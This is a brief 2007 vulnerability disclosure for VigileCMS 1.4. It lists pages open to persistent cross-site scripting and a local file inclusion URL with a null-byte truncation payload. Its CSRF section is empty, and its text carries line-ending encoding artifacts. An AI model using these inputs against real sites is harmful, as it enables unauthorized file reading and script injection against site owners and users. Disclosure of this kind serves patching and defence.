|
VigileCMS 1.4 Multiple Remote Vulnerabilities=0D
---------------------------------------------------------------------------------------=0D
---------------------------------------------------------------------------------------=0D
Author : DevilAuron (http://devilsnight.altervista.org)=0D
=0D
Vendor : VigileCMS 1.4=0D
Date : [16-11-2007] (dd-mm-yyyy)=0D
=0D
=0D
Permanent Xss:=0D
---------------------------------------------------------------------------------------=0D
http://[site]/[path]/index.php?module=vedipm&inviapm=true=0D
http://[site]/[path]/index.php?module=live_chat=0D
Insert on the message the xss=0D
=0D
=0D
Local File Inclusion:=0D
---------------------------------------------------------------------------------------=0D
http://[site]/[path]/index.php?module=[somefile]%00=0D
=0D
=0D
CSRF:=0D
---------------------------------------------------------------------------------------=0D
=0D
=0D
=0D
=0D
---------------------------------------------------------------------------------------=0D